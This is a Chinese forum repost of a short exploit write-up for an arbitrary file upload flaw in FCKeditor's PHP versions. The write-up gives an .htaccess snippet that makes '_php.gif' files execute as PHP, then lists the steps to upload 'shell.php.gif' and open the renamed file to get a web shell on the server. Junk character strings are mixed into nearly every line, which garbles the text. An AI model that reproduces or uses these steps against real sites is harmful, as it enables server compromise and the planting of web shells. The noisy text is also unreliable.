FCKeditor所有php版本Upload上传漏洞
8 o2 M1 o+ l( b Z( s作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
/ a0 @. D+ F: j2 @* @+ d7 b减小字体 增大字体
5 s6 ~/ p4 f% i0 b1 e/ I[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
9 ?2 _* K' M: W6 @/ A( A[+] Date: 20111 j& X7 h2 }: U; r
[+] Author : sinesafe.cn
; @6 X7 a D% W7 c! F0 X2 v[+] Website : WwW.sinesafe.cn
1 P; F! D4 H8 F% c———————————————————( \: j: z3 X' {6 r
1.create a htaccess file:
+ z4 {4 L X! r9 w2 gcode:8 }; m3 I* O- S4 c, r b( ^! F
<FilesMatch “_php.gif”>
! N! D k- l' W E* ?: o# Z" ~" MSetHandler application/x-httpd-php
A# }8 P4 N" o' r2 [" d! O' m" h7 j6 I</FilesMatch>3 O1 c% B0 l3 d
# f* X" u3 A$ D+ k8 [
2.Now upload this htaccess with FCKeditor.
* `: k' G, x' `0 ^: b2 k6 }5 D, G
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
" K8 b3 Y) j; ^' r5 o1 t M' l) D8 m* e5 ]- E! h- u$ ^: K6 p
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html0 I: k, L' ]& M w: s0 v/ Z# @
- d! q( |. x) r* S———————————————————————————————-
0 l, L5 E! E. ^$ @# j9 t3.Now upload shell.php.gif with FCKeditor.& `. c# W% q: `4 V% ]5 [0 y
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.7 H4 \; z0 s: w
5.http://www.sinesafe.cn/anything/shell_php.gif
W1 J4 |7 [* ]* G6.Now shell is available from server. |
3 D6 t/ n& q, c1 A: k: Y4 E8 \/ M* b& {
) O: ?* {' h6 q* q6 d# P$ l
1 F0 X$ d4 a, ~) C4 w8 B: d p- R
|
发表于 2013-10-27 17:25:21
收藏
支持
反对